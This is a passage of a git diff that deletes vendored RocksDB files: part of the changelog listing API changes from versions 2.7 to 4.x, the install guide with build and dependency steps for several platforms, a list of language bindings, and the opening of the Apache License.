-* Add kPersistedTier to ReadTier.  This option allows Get and MultiGet to read only the persited data and skip mem-tables if writes were done with disableWAL = true.
-* Add DBOptions::sst_file_manager. Use NewSstFileManager() in include/rocksdb/sst_file_manager.h to create a SstFileManager that can be used to track the total size of SST files and control the SST files deletion rate.
-
-## 4.4.0 (1/14/2016)
-### Public API Changes
-* Change names in CompactionPri and add a new one.
-* Deprecate options.soft_rate_limit and add options.soft_pending_compaction_bytes_limit.
-* If options.max_write_buffer_number > 3, writes will be slowed down when writing to the last write buffer to delay a full stop.
-* Introduce CompactionJobInfo::compaction_reason, this field include the reason to trigger the compaction.
-* After slow down is triggered, if estimated pending compaction bytes keep increasing, slowdown more.
-* Increase default options.delayed_write_rate to 2MB/s.
-* Added a new parameter --path to ldb tool. --path accepts the name of either MANIFEST, SST or a WAL file. Either --db or --path can be used when calling ldb.
-
-## 4.3.0 (12/8/2015)
-### New Features
-* CompactionFilter has new member function called IgnoreSnapshots which allows CompactionFilter to be called even if there are snapshots later than the key.
-* RocksDB will now persist options under the same directory as the RocksDB database on successful DB::Open, CreateColumnFamily, DropColumnFamily, and SetOptions.
-* Introduce LoadLatestOptions() in rocksdb/utilities/options_util.h.  This function can construct the latest DBOptions / ColumnFamilyOptions used by the specified RocksDB intance.
-* Introduce CheckOptionsCompatibility() in rocksdb/utilities/options_util.h.  This function checks whether the input set of options is able to open the specified DB successfully.
-
-### Public API Changes
-* When options.db_write_buffer_size triggers, only the column family with the largest column family size will be flushed, not all the column families.
-
-## 4.2.0 (11/9/2015)
-### New Features
-* Introduce CreateLoggerFromOptions(), this function create a Logger for provided DBOptions.
-* Add GetAggregatedIntProperty(), which returns the sum of the GetIntProperty of all the column families.
-* Add MemoryUtil in rocksdb/utilities/memory.h.  It currently offers a way to get the memory usage by type from a list rocksdb instances.
-
-### Public API Changes
-* CompactionFilter::Context includes information of Column Family ID
-* The need-compaction hint given by TablePropertiesCollector::NeedCompact() will be persistent and recoverable after DB recovery. This introduces a breaking format change. If you use this experimental feature, including NewCompactOnDeletionCollectorFactory() in the new version, you may not be able to directly downgrade the DB back to version 4.0 or lower.
-* TablePropertiesCollectorFactory::CreateTablePropertiesCollector() now takes an option Context, containing the information of column family ID for the file being written.
-* Remove DefaultCompactionFilterFactory.
-
-
-## 4.1.0 (10/8/2015)
-### New Features
-* Added single delete operation as a more efficient way to delete keys that have not been overwritten.
-* Added experimental AddFile() to DB interface that allow users to add files created by SstFileWriter into an empty Database, see include/rocksdb/sst_file_writer.h and DB::AddFile() for more info.
-* Added support for opening SST files with .ldb suffix which enables opening LevelDB databases.
-* CompactionFilter now supports filtering of merge operands and merge results.
-
-### Public API Changes
-* Added SingleDelete() to the DB interface.
-* Added AddFile() to DB interface.
-* Added SstFileWriter class.
-* CompactionFilter has a new method FilterMergeOperand() that RocksDB applies to every merge operand during compaction to decide whether to filter the operand.
-* We removed CompactionFilterV2 interfaces from include/rocksdb/compaction_filter.h. The functionality was deprecated already in version 3.13.
-
-## 4.0.0 (9/9/2015)
-### New Features
-* Added support for transactions.  See include/rocksdb/utilities/transaction.h for more info.
-* DB::GetProperty() now accepts "rocksdb.aggregated-table-properties" and "rocksdb.aggregated-table-properties-at-levelN", in which case it returns aggregated table properties of the target column family, or the aggregated table properties of the specified level N if the "at-level" version is used.
-* Add compression option kZSTDNotFinalCompression for people to experiment ZSTD although its format is not finalized.
-* We removed the need for LATEST_BACKUP file in BackupEngine. We still keep writing it when we create new backups (because of backward compatibility), but we don't read it anymore.
-
-### Public API Changes
-* Removed class Env::RandomRWFile and Env::NewRandomRWFile().
-* Renamed DBOptions.num_subcompactions to DBOptions.max_subcompactions to make the name better match the actual functionality of the option.
-* Added Equal() method to the Comparator interface that can optionally be overwritten in cases where equality comparisons can be done more efficiently than three-way comparisons.
-* Previous 'experimental' OptimisticTransaction class has been replaced by Transaction class.
-
-## 3.13.0 (8/6/2015)
-### New Features
-* RollbackToSavePoint() in WriteBatch/WriteBatchWithIndex
-* Add NewCompactOnDeletionCollectorFactory() in utilities/table_properties_collectors, which allows rocksdb to mark a SST file as need-compaction when it observes at least D deletion entries in any N consecutive entries in that SST file.  Note that this feature depends on an experimental NeedCompact() API --- the result of this API will not persist after DB restart.
-* Add DBOptions::delete_scheduler. Use NewDeleteScheduler() in include/rocksdb/delete_scheduler.h to create a DeleteScheduler that can be shared among multiple RocksDB instances to control the file deletion rate of SST files that exist in the first db_path.
-
-### Public API Changes
-* Deprecated WriteOptions::timeout_hint_us. We no longer support write timeout. If you really need this option, talk to us and we might consider returning it.
-* Deprecated purge_redundant_kvs_while_flush option.
-* Removed BackupEngine::NewBackupEngine() and NewReadOnlyBackupEngine() that were deprecated in RocksDB 3.8. Please use BackupEngine::Open() instead.
-* Deprecated Compaction Filter V2. We are not aware of any existing use-cases. If you use this filter, your compile will break with RocksDB 3.13. Please let us know if you use it and we'll put it back in RocksDB 3.14.
-* Env::FileExists now returns a Status instead of a boolean
-* Add statistics::getHistogramString() to print detailed distribution of a histogram metric.
-* Add DBOptions::skip_stats_update_on_db_open.  When it is on, DB::Open() will run faster as it skips the random reads required for loading necessary stats from SST files to optimize compaction.
-
-## 3.12.0 (7/2/2015)
-### New Features
-* Added experimental support for optimistic transactions.  See include/rocksdb/utilities/optimistic_transaction.h for more info.
-* Added a new way to report QPS from db_bench (check out --report_file and --report_interval_seconds)
-* Added a cache for individual rows. See DBOptions::row_cache for more info.
-* Several new features on EventListener (see include/rocksdb/listener.h):
- - OnCompationCompleted() now returns per-compaction job statistics, defined in include/rocksdb/compaction_job_stats.h.
- - Added OnTableFileCreated() and OnTableFileDeleted().
-* Add compaction_options_universal.enable_trivial_move to true, to allow trivial move while performing universal compaction. Trivial move will happen only when all the input files are non overlapping.
-
-### Public API changes
-* EventListener::OnFlushCompleted() now passes FlushJobInfo instead of a list of parameters.
-* DB::GetDbIdentity() is now a const function.  If this function is overridden in your application, be sure to also make GetDbIdentity() const to avoid compile error.
-* Move listeners from ColumnFamilyOptions to DBOptions.
-* Add max_write_buffer_number_to_maintain option
-* DB::CompactRange()'s parameter reduce_level is changed to change_level, to allow users to move levels to lower levels if allowed. It can be used to migrate a DB from options.level_compaction_dynamic_level_bytes=false to options.level_compaction_dynamic_level_bytes.true.
-* Change default value for options.compaction_filter_factory and options.compaction_filter_factory_v2 to nullptr instead of DefaultCompactionFilterFactory and DefaultCompactionFilterFactoryV2.
-* If CancelAllBackgroundWork is called without doing a flush after doing loads with WAL disabled, the changes which haven't been flushed before the call to CancelAllBackgroundWork will be lost.
-* WBWIIterator::Entry() now returns WriteEntry instead of `const WriteEntry&`
-* options.hard_rate_limit is deprecated.
-* When options.soft_rate_limit or options.level0_slowdown_writes_trigger is triggered, the way to slow down writes is changed to: write rate to DB is limited to to options.delayed_write_rate.
-* DB::GetApproximateSizes() adds a parameter to allow the estimation to include data in mem table, with default to be not to include. It is now only supported in skip list mem table.
-* DB::CompactRange() now accept CompactRangeOptions instead of multiple parameters. CompactRangeOptions is defined in include/rocksdb/options.h.
-* CompactRange() will now skip bottommost level compaction for level based compaction if there is no compaction filter, bottommost_level_compaction is introduced in CompactRangeOptions to control when it's possible to skip bottommost level compaction. This mean that if you want the compaction to produce a single file you need to set bottommost_level_compaction to BottommostLevelCompaction::kForce.
-* Add Cache.GetPinnedUsage() to get the size of memory occupied by entries that are in use by the system.
-* DB:Open() will fail if the compression specified in Options is not linked with the binary. If you see this failure, recompile RocksDB with compression libraries present on your system. Also, previously our default compression was snappy. This behavior is now changed. Now, the default compression is snappy only if it's available on the system. If it isn't we change the default to kNoCompression.
-* We changed how we account for memory used in block cache. Previously, we only counted the sum of block sizes currently present in block cache. Now, we count the actual memory usage of the blocks. For example, a block of size 4.5KB will use 8KB memory with jemalloc. This might decrease your memory usage and possibly decrease performance. Increase block cache size if you see this happening after an upgrade.
-* Add BackupEngineImpl.options_.max_background_operations to specify the maximum number of operations that may be performed in parallel. Add support for parallelized backup and restore.
-* Add DB::SyncWAL() that does a WAL sync without blocking writers.
-
-## 3.11.0 (5/19/2015)
-### New Features
-* Added a new API Cache::SetCapacity(size_t capacity) to dynamically change the maximum configured capacity of the cache. If the new capacity is less than the existing cache usage, the implementation will try to lower the usage by evicting the necessary number of elements following a strict LRU policy.
-* Added an experimental API for handling flashcache devices (blacklists background threads from caching their reads) -- NewFlashcacheAwareEnv
-* If universal compaction is used and options.num_levels > 1, compact files are tried to be stored in none-L0 with smaller files based on options.target_file_size_base. The limitation of DB size when using universal compaction is greatly mitigated by using more levels. You can set num_levels = 1 to make universal compaction behave as before. If you set num_levels > 1 and want to roll back to a previous version, you need to compact all files to a big file in level 0 (by setting target_file_size_base to be large and CompactRange(<cf_handle>, nullptr, nullptr, true, 0) and reopen the DB with the same version to rewrite the manifest, and then you can open it using previous releases.
-* More information about rocksdb background threads are available in Env::GetThreadList(), including the number of bytes read / written by a compaction job, mem-table size and current number of bytes written by a flush job and many more.  Check include/rocksdb/thread_status.h for more detail.
-
-### Public API changes
-* TablePropertiesCollector::AddUserKey() is added to replace TablePropertiesCollector::Add(). AddUserKey() exposes key type, sequence number and file size up to now to users.
-* DBOptions::bytes_per_sync used to apply to both WAL and table files. As of 3.11 it applies only to table files. If you want to use this option to sync WAL in the background, please use wal_bytes_per_sync
-
-## 3.10.0 (3/24/2015)
-### New Features
-* GetThreadStatus() is now able to report detailed thread status, including:
- - Thread Operation including flush and compaction.
- - The stage of the current thread operation.
- - The elapsed time in micros since the current thread operation started.
- More information can be found in include/rocksdb/thread_status.h.  In addition, when running db_bench with --thread_status_per_interval, db_bench will also report thread status periodically.
-* Changed the LRU caching algorithm so that referenced blocks (by iterators) are never evicted. This change made parameter removeScanCountLimit obsolete. Because of that NewLRUCache doesn't take three arguments anymore. table_cache_remove_scan_limit option is also removed
-* By default we now optimize the compilation for the compilation platform (using -march=native). If you want to build portable binary, use 'PORTABLE=1' before the make command.
-* We now allow level-compaction to place files in different paths by
-  specifying them in db_paths along with the target_size.
-  Lower numbered levels will be placed earlier in the db_paths and higher
-  numbered levels will be placed later in the db_paths vector.
-* Potentially big performance improvements if you're using RocksDB with lots of column families (100-1000)
-* Added BlockBasedTableOptions.format_version option, which allows user to specify which version of block based table he wants. As a general guideline, newer versions have more features, but might not be readable by older versions of RocksDB.
-* Added new block based table format (version 2), which you can enable by setting BlockBasedTableOptions.format_version = 2. This format changes how we encode size information in compressed blocks and should help with memory allocations if you're using Zlib or BZip2 compressions.
-* MemEnv (env that stores data in memory) is now available in default library build. You can create it by calling NewMemEnv().
-* Add SliceTransform.SameResultWhenAppended() to help users determine it is safe to apply prefix bloom/hash.
-* Block based table now makes use of prefix bloom filter if it is a full fulter.
-* Block based table remembers whether a whole key or prefix based bloom filter is supported in SST files. Do a sanity check when reading the file with users' configuration.
-* Fixed a bug in ReadOnlyBackupEngine that deleted corrupted backups in some cases, even though the engine was ReadOnly
-* options.level_compaction_dynamic_level_bytes, a feature to allow RocksDB to pick dynamic base of bytes for levels. With this feature turned on, we will automatically adjust max bytes for each level. The goal of this feature is to have lower bound on size amplification. For more details, see comments in options.h.
-* Added an abstract base class WriteBatchBase for write batches
-* Fixed a bug where we start deleting files of a dropped column families even if there are still live references to it
-
-### Public API changes
-* Deprecated skip_log_error_on_recovery and table_cache_remove_scan_count_limit options.
-* Logger method logv with log level parameter is now virtual
-
-### RocksJava
-* Added compression per level API.
-* MemEnv is now available in RocksJava via RocksMemEnv class.
-* lz4 compression is now included in rocksjava static library when running `make rocksdbjavastatic`.
-* Overflowing a size_t when setting rocksdb options now throws an IllegalArgumentException, which removes the necessity for a developer to catch these Exceptions explicitly.
-
-## 3.9.0 (12/8/2014)
-
-### New Features
-* Add rocksdb::GetThreadList(), which in the future will return the current status of all
-  rocksdb-related threads.  We will have more code instruments in the following RocksDB
-  releases.
-* Change convert function in rocksdb/utilities/convenience.h to return Status instead of boolean.
-  Also add support for nested options in convert function
-
-### Public API changes
-* New API to create a checkpoint added. Given a directory name, creates a new
-  database which is an image of the existing database.
-* New API LinkFile added to Env. If you implement your own Env class, an
-  implementation of the API LinkFile will have to be provided.
-* MemTableRep takes MemTableAllocator instead of Arena
-
-### Improvements
-* RocksDBLite library now becomes smaller and will be compiled with -fno-exceptions flag.
-
-## 3.8.0 (11/14/2014)
-
-### Public API changes
-* BackupEngine::NewBackupEngine() was deprecated; please use BackupEngine::Open() from now on.
-* BackupableDB/RestoreBackupableDB have new GarbageCollect() methods, which will clean up files from corrupt and obsolete backups.
-* BackupableDB/RestoreBackupableDB have new GetCorruptedBackups() methods which list corrupt backups.
-
-### Cleanup
-* Bunch of code cleanup, some extra warnings turned on (-Wshadow, -Wshorten-64-to-32, -Wnon-virtual-dtor)
-
-### New features
-* CompactFiles and EventListener, although they are still in experimental state
-* Full ColumnFamily support in RocksJava.
-
-## 3.7.0 (11/6/2014)
-### Public API changes
-* Introduce SetOptions() API to allow adjusting a subset of options dynamically online
-* Introduce 4 new convenient functions for converting Options from string: GetColumnFamilyOptionsFromMap(), GetColumnFamilyOptionsFromString(), GetDBOptionsFromMap(), GetDBOptionsFromString()
-* Remove WriteBatchWithIndex.Delete() overloads using SliceParts
-* When opening a DB, if options.max_background_compactions is larger than the existing low pri pool of options.env, it will enlarge it. Similarly, options.max_background_flushes is larger than the existing high pri pool of options.env, it will enlarge it.
-
-## 3.6.0 (10/7/2014)
-### Disk format changes
-* If you're using RocksDB on ARM platforms and you're using default bloom filter, there is a disk format change you need to be aware of. There are three steps you need to do when you convert to new release: 1. turn off filter policy, 2. compact the whole database, 3. turn on filter policy
-
-### Behavior changes
-* We have refactored our system of stalling writes.  Any stall-related statistics' meanings are changed. Instead of per-write stall counts, we now count stalls per-epoch, where epochs are periods between flushes and compactions. You'll find more information in our Tuning Perf Guide once we release RocksDB 3.6.
-* When disableDataSync=true, we no longer sync the MANIFEST file.
-* Add identity_as_first_hash property to CuckooTable. SST file needs to be rebuilt to be opened by reader properly.
-
-### Public API changes
-* Change target_file_size_base type to uint64_t from int.
-* Remove allow_thread_local. This feature was proved to be stable, so we are turning it always-on.
-
-## 3.5.0 (9/3/2014)
-### New Features
-* Add include/utilities/write_batch_with_index.h, providing a utility class to query data out of WriteBatch when building it.
-* Move BlockBasedTable related options to BlockBasedTableOptions from Options. Change corresponding JNI interface. Options affected include:
-  no_block_cache, block_cache, block_cache_compressed, block_size, block_size_deviation, block_restart_interval, filter_policy, whole_key_filtering. filter_policy is changed to shared_ptr from a raw pointer.
-* Remove deprecated options: disable_seek_compaction and db_stats_log_interval
-* OptimizeForPointLookup() takes one parameter for block cache size. It now builds hash index, bloom filter, and block cache.
-
-### Public API changes
-* The Prefix Extractor used with V2 compaction filters is now passed user key to SliceTransform::Transform instead of unparsed RocksDB key.
-
-## 3.4.0 (8/18/2014)
-### New Features
-* Support Multiple DB paths in universal style compactions
-* Add feature of storing plain table index and bloom filter in SST file.
-* CompactRange() will never output compacted files to level 0. This used to be the case when all the compaction input files were at level 0.
-* Added iterate_upper_bound to define the extent upto which the forward iterator will return entries. This will prevent iterating over delete markers and overwritten entries for edge cases where you want to break out the iterator anyways. This may improve performance in case there are a large number of delete markers or overwritten entries.
-
-### Public API changes
-* DBOptions.db_paths now is a vector of a DBPath structure which indicates both of path and target size
-* NewPlainTableFactory instead of bunch of parameters now accepts PlainTableOptions, which is defined in include/rocksdb/table.h
-* Moved include/utilities/*.h to include/rocksdb/utilities/*.h
-* Statistics APIs now take uint32_t as type instead of Tickers. Also make two access functions getTickerCount and histogramData const
-* Add DB property rocksdb.estimate-num-keys, estimated number of live keys in DB.
-* Add DB::GetIntProperty(), which returns DB properties that are integer as uint64_t.
-* The Prefix Extractor used with V2 compaction filters is now passed user key to SliceTransform::Transform instead of unparsed RocksDB key.
-
-## 3.3.0 (7/10/2014)
-### New Features
-* Added JSON API prototype.
-* HashLinklist reduces performance outlier caused by skewed bucket by switching data in the bucket from linked list to skip list. Add parameter threshold_use_skiplist in NewHashLinkListRepFactory().
-* RocksDB is now able to reclaim storage space more effectively during the compaction process.  This is done by compensating the size of each deletion entry by the 2X average value size, which makes compaction to be triggered by deletion entries more easily.
-* Add TimeOut API to write.  Now WriteOptions have a variable called timeout_hint_us.  With timeout_hint_us set to non-zero, any write associated with this timeout_hint_us may be aborted when it runs longer than the specified timeout_hint_us, and it is guaranteed that any write completes earlier than the specified time-out will not be aborted due to the time-out condition.
-* Add a rate_limiter option, which controls total throughput of flush and compaction. The throughput is specified in bytes/sec. Flush always has precedence over compaction when available bandwidth is constrained.
-
-### Public API changes
-* Removed NewTotalOrderPlainTableFactory because it is not used and implemented semantically incorrect.
-
-## 3.2.0 (06/20/2014)
-
-### Public API changes
-* We removed seek compaction as a concept from RocksDB because:
-1) It makes more sense for spinning disk workloads, while RocksDB is primarily designed for flash and memory,
-2) It added some complexity to the important code-paths,
-3) None of our internal customers were really using it.
-Because of that, Options::disable_seek_compaction is now obsolete. It is still a parameter in Options, so it does not break the build, but it does not have any effect. We plan to completely remove it at some point, so we ask users to please remove this option from your code base.
-* Add two parameters to NewHashLinkListRepFactory() for logging on too many entries in a hash bucket when flushing.
-* Added new option BlockBasedTableOptions::hash_index_allow_collision. When enabled, prefix hash index for block-based table will not store prefix and allow hash collision, reducing memory consumption.
-
-### New Features
-* PlainTable now supports a new key encoding: for keys of the same prefix, the prefix is only written once. It can be enabled through encoding_type parameter of NewPlainTableFactory()
-* Add AdaptiveTableFactory, which is used to convert from a DB of PlainTable to BlockBasedTabe, or vise versa. It can be created using NewAdaptiveTableFactory()
-
-### Performance Improvements
-* Tailing Iterator re-implemeted with ForwardIterator + Cascading Search Hint , see ~20% throughput improvement.
-
-## 3.1.0 (05/21/2014)
-
-### Public API changes
-* Replaced ColumnFamilyOptions::table_properties_collectors with ColumnFamilyOptions::table_properties_collector_factories
-
-### New Features
-* Hash index for block-based table will be materialized and reconstructed more efficiently. Previously hash index is constructed by scanning the whole table during every table open.
-* FIFO compaction style
-
-## 3.0.0 (05/05/2014)
-
-### Public API changes
-* Added _LEVEL to all InfoLogLevel enums
-* Deprecated ReadOptions.prefix and ReadOptions.prefix_seek. Seek() defaults to prefix-based seek when Options.prefix_extractor is supplied. More detail is documented in https://github.com/facebook/rocksdb/wiki/Prefix-Seek-API-Changes
-* MemTableRepFactory::CreateMemTableRep() takes info logger as an extra parameter.
-
-### New Features
-* Column family support
-* Added an option to use different checksum functions in BlockBasedTableOptions
-* Added ApplyToAllCacheEntries() function to Cache
-
-## 2.8.0 (04/04/2014)
-
-* Removed arena.h from public header files.
-* By default, checksums are verified on every read from database
-* Change default value of several options, including: paranoid_checks=true, max_open_files=5000, level0_slowdown_writes_trigger=20, level0_stop_writes_trigger=24, disable_seek_compaction=true, max_background_flushes=1 and allow_mmap_writes=false
-* Added is_manual_compaction to CompactionFilter::Context
-* Added "virtual void WaitForJoin()" in class Env. Default operation is no-op.
-* Removed BackupEngine::DeleteBackupsNewerThan() function
-* Added new option -- verify_checksums_in_compaction
-* Changed Options.prefix_extractor from raw pointer to shared_ptr (take ownership)
-  Changed HashSkipListRepFactory and HashLinkListRepFactory constructor to not take SliceTransform object (use Options.prefix_extractor implicitly)
-* Added Env::GetThreadPoolQueueLen(), which returns the waiting queue length of thread pools
-* Added a command "checkconsistency" in ldb tool, which checks
-  if file system state matches DB state (file existence and file sizes)
-* Separate options related to block based table to a new struct BlockBasedTableOptions.
-* WriteBatch has a new function Count() to return total size in the batch, and Data() now returns a reference instead of a copy
-* Add more counters to perf context.
-* Supports several more DB properties: compaction-pending, background-errors and cur-size-active-mem-table.
-
-### New Features
-* If we find one truncated record at the end of the MANIFEST or WAL files,
-  we will ignore it. We assume that writers of these records were interrupted
-  and that we can safely ignore it.
-* A new SST format "PlainTable" is added, which is optimized for memory-only workloads. It can be created through NewPlainTableFactory() or NewTotalOrderPlainTableFactory().
-* A new mem table implementation hash linked list optimizing for the case that there are only few keys for each prefix, which can be created through NewHashLinkListRepFactory().
-* Merge operator supports a new function PartialMergeMulti() to allow users to do partial merges against multiple operands.
-* Now compaction filter has a V2 interface. It buffers the kv-pairs sharing the same key prefix, process them in batches, and return the batched results back to DB. The new interface uses a new structure CompactionFilterContext for the same purpose as CompactionFilter::Context in V1.
-* Geo-spatial support for locations and radial-search.
-
-## 2.7.0 (01/28/2014)
-
-### Public API changes
-
-* Renamed `StackableDB::GetRawDB()` to `StackableDB::GetBaseDB()`.
-* Renamed `WriteBatch::Data()` `const std::string& Data() const`.
-* Renamed class `TableStats` to `TableProperties`.
-* Deleted class `PrefixHashRepFactory`. Please use `NewHashSkipListRepFactory()` instead.
-* Supported multi-threaded `EnableFileDeletions()` and `DisableFileDeletions()`.
-* Added `DB::GetOptions()`.
-* Added `DB::GetDbIdentity()`.
-
-### New Features
-
-* Added [BackupableDB](https://github.com/facebook/rocksdb/wiki/How-to-backup-RocksDB%3F)
-* Implemented [TailingIterator](https://github.com/facebook/rocksdb/wiki/Tailing-Iterator), a special type of iterator that
-  doesn't create a snapshot (can be used to read newly inserted data)
-  and is optimized for doing sequential reads.
-* Added property block for table, which allows (1) a table to store
-  its metadata and (2) end user to collect and store properties they
-  are interested in.
-* Enabled caching index and filter block in block cache (turned off by default).
-* Supported error report when doing manual compaction.
-* Supported additional Linux platform flavors and Mac OS.
-* Put with `SliceParts` - Variant of `Put()` that gathers output like `writev(2)`
-* Bug fixes and code refactor for compatibility with upcoming Column
-  Family feature.
-
-### Performance Improvements
-
-* Huge benchmark performance improvements by multiple efforts. For example, increase in readonly QPS from about 530k in 2.6 release to 1.1 million in 2.7 [1]
-* Speeding up a way RocksDB deleted obsolete files - no longer listing the whole directory under a lock -- decrease in p99
-* Use raw pointer instead of shared pointer for statistics: [5b825d](https://github.com/facebook/rocksdb/commit/5b825d6964e26ec3b4bb6faa708ebb1787f1d7bd) -- huge increase in performance -- shared pointers are slow
-* Optimized locking for `Get()` -- [1fdb3f](https://github.com/facebook/rocksdb/commit/1fdb3f7dc60e96394e3e5b69a46ede5d67fb976c) -- 1.5x QPS increase for some workloads
-* Cache speedup - [e8d40c3](https://github.com/facebook/rocksdb/commit/e8d40c31b3cca0c3e1ae9abe9b9003b1288026a9)
-* Implemented autovector, which allocates first N elements on stack. Most of vectors in RocksDB are small. Also, we never want to allocate heap objects while holding a mutex. -- [c01676e4](https://github.com/facebook/rocksdb/commit/c01676e46d3be08c3c140361ef1f5884f47d3b3c)
-* Lots of efforts to move malloc, memcpy and IO outside of locks
diff --git a/thirdparty/rocksdb/INSTALL.md b/thirdparty/rocksdb/INSTALL.md
deleted file mode 100644
index 04f0eb2..0000000
--- a/thirdparty/rocksdb/INSTALL.md
+++ /dev/null
@@ -1,144 +0,0 @@
-## Compilation
-
-**Important**: If you plan to run RocksDB in production, don't compile using default
-`make` or `make all`. That will compile RocksDB in debug mode, which is much slower
-than release mode.
-
-RocksDB's library should be able to compile without any dependency installed,
-although we recommend installing some compression libraries (see below).
-We do depend on newer gcc/clang with C++11 support.
-
-There are few options when compiling RocksDB:
-
-* [recommended] `make static_lib` will compile librocksdb.a, RocksDB static library. Compiles static library in release mode.
-
-* `make shared_lib` will compile librocksdb.so, RocksDB shared library. Compiles shared library in release mode.
-
-* `make check` will compile and run all the unit tests. `make check` will compile RocksDB in debug mode.
-
-* `make all` will compile our static library, and all our tools and unit tests. Our tools
-depend on gflags. You will need to have gflags installed to run `make all`. This will compile RocksDB in debug mode. Don't
-use binaries compiled by `make all` in production.
-
-* By default the binary we produce is optimized for the platform you're compiling on
-(`-march=native` or the equivalent). SSE4.2 will thus be enabled automatically if your
-CPU supports it. To print a warning if your CPU does not support SSE4.2, build with
-`USE_SSE=1 make static_lib` or, if using CMake, `cmake -DFORCE_SSE42=ON`. If you want
-to build a portable binary, add `PORTABLE=1` before your make commands, like this:
-`PORTABLE=1 make static_lib`.
-
-## Dependencies
-
-* You can link RocksDB with following compression libraries:
-  - [zlib](http://www.zlib.net/) - a library for data compression.
-  - [bzip2](http://www.bzip.org/) - a library for data compression.
-  - [lz4](https://github.com/lz4/lz4) - a library for extremely fast data compression.
-  - [snappy](http://google.github.io/snappy/) - a library for fast
-      data compression.
-  - [zstandard](http://www.zstd.net) - Fast real-time compression
-      algorithm.
-
-* All our tools depend on:
-  - [gflags](https://gflags.github.io/gflags/) - a library that handles
-      command line flags processing. You can compile rocksdb library even
-      if you don't have gflags installed.
-
-## Supported platforms
-
-* **Linux - Ubuntu**
-    * Upgrade your gcc to version at least 4.8 to get C++11 support.
-    * Install gflags. First, try: `sudo apt-get install libgflags-dev`
-      If this doesn't work and you're using Ubuntu, here's a nice tutorial:
-      (http://askubuntu.com/questions/312173/installing-gflags-12-04)
-    * Install snappy. This is usually as easy as:
-      `sudo apt-get install libsnappy-dev`.
-    * Install zlib. Try: `sudo apt-get install zlib1g-dev`.
-    * Install bzip2: `sudo apt-get install libbz2-dev`.
-    * Install lz4: `sudo apt-get install liblz4-dev`.
-    * Install zstandard: `sudo apt-get install libzstd-dev`.
-
-* **Linux - CentOS / RHEL**
-    * Upgrade your gcc to version at least 4.8 to get C++11 support:
-      `yum install gcc48-c++`
-    * Install gflags:
-
-              git clone https://github.com/gflags/gflags.git
-              cd gflags
-              git checkout v2.0
-              ./configure && make && sudo make install
-
-      **Notice**: Once installed, please add the include path for gflags to your `CPATH` environment variable and the
-      lib path to `LIBRARY_PATH`. If installed with default settings, the include path will be `/usr/local/include`
-      and the lib path will be `/usr/local/lib`.
-
-    * Install snappy:
-
-              sudo yum install snappy snappy-devel
-
-    * Install zlib:
-
-              sudo yum install zlib zlib-devel
-
-    * Install bzip2:
-
-              sudo yum install bzip2 bzip2-devel
-
-    * Install lz4:
-
-              sudo yum install lz4-devel
-
-    * Install ASAN (optional for debugging):
-
-              sudo yum install libasan
-
-    * Install zstandard:
-
-             wget https://github.com/facebook/zstd/archive/v1.1.3.tar.gz
-             mv v1.1.3.tar.gz zstd-1.1.3.tar.gz
-             tar zxvf zstd-1.1.3.tar.gz
-             cd zstd-1.1.3
-             make && sudo make install
-
-* **OS X**:
-    * Install latest C++ compiler that supports C++ 11:
-        * Update XCode:  run `xcode-select --install` (or install it from XCode App's settting).
-        * Install via [homebrew](http://brew.sh/).
-            * If you're first time developer in MacOS, you still need to run: `xcode-select --install` in your command line.
-            * run `brew tap homebrew/versions; brew install gcc48 --use-llvm` to install gcc 4.8 (or higher).
-    * run `brew install rocksdb`
-
-* **iOS**:
-  * Run: `TARGET_OS=IOS make static_lib`. When building the project which uses rocksdb iOS library, make sure to define two important pre-processing macros: `ROCKSDB_LITE` and `IOS_CROSS_COMPILE`.
-
-* **Windows**:
-  * For building with MS Visual Studio 13 you will need Update 4 installed.
-  * Read and follow the instructions at CMakeLists.txt
-  * Or install via [vcpkg](https://github.com/microsoft/vcpkg) 
-       * run `vcpkg install rocksdb`
-
-* **AIX 6.1**
-    * Install AIX Toolbox rpms with gcc
-    * Use these environment variables:
-  
-             export PORTABLE=1
-             export CC=gcc
-             export AR="ar -X64"
-             export EXTRA_ARFLAGS=-X64
-             export EXTRA_CFLAGS=-maix64
-             export EXTRA_CXXFLAGS=-maix64
-             export PLATFORM_LDFLAGS="-static-libstdc++ -static-libgcc"
-             export LIBPATH=/opt/freeware/lib
-             export JAVA_HOME=/usr/java8_64
-             export PATH=/opt/freeware/bin:$PATH
-  
-* **Solaris Sparc**
-    * Install GCC 4.8.2 and higher.
-    * Use these environment variables:
-
-             export CC=gcc
-             export EXTRA_CFLAGS=-m64
-             export EXTRA_CXXFLAGS=-m64
-             export EXTRA_LDFLAGS=-m64
-             export PORTABLE=1
-             export PLATFORM_LDFLAGS="-static-libstdc++ -static-libgcc"
-
diff --git a/thirdparty/rocksdb/LANGUAGE-BINDINGS.md b/thirdparty/rocksdb/LANGUAGE-BINDINGS.md
deleted file mode 100644
index ffeed98..0000000
--- a/thirdparty/rocksdb/LANGUAGE-BINDINGS.md
+++ /dev/null
@@ -1,16 +0,0 @@
-This is the list of all known third-party language bindings for RocksDB. If something is missing, please open a pull request to add it.
-
-* Java - https://github.com/facebook/rocksdb/tree/master/java
-* Python - http://pyrocksdb.readthedocs.org/en/latest/
-* Perl - https://metacpan.org/pod/RocksDB
-* Node.js - https://npmjs.org/package/rocksdb
-* Go - https://github.com/tecbot/gorocksdb
-* Ruby - http://rubygems.org/gems/rocksdb-ruby
-* Haskell - https://hackage.haskell.org/package/rocksdb-haskell
-* PHP - https://github.com/Photonios/rocksdb-php
-* C# - https://github.com/warrenfalk/rocksdb-sharp
-* Rust
-    * https://github.com/spacejam/rust-rocksdb
-    * https://github.com/bh1xuw/rust-rocks
-* D programming language - https://github.com/b1naryth1ef/rocksdb
-* Erlang - https://gitlab.com/barrel-db/erlang-rocksdb
diff --git a/thirdparty/rocksdb/LICENSE.Apache b/thirdparty/rocksdb/LICENSE.Apache
deleted file mode 100644
index d645695..0000000
--- a/thirdparty/rocksdb/LICENSE.Apache
+++ /dev/null
@@ -1,202 +0,0 @@
-
-                                 Apache License
-                           Version 2.0, January 2004
-                        http://www.apache.org/licenses/
-
-   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
-
-   1. Definitions.
-
-      "License" shall mean the terms and conditions for use, reproduction,
-      and distribution as defined by Sections 1 through 9 of this document.
-
-      "Licensor" shall mean the copyright owner or entity authorized by
-      the copyright owner that is granting the License.
-
-      "Legal Entity" shall mean the union of the acting entity and all
-      other entities that control, are controlled by, or are under common
-      control with that entity. For the purposes of this definition,
-      "control" means (i) the power, direct or indirect, to cause the
-      direction or management of such entity, whether by contract or
-      otherwise, or (ii) ownership of fifty percent (50%) or more of the
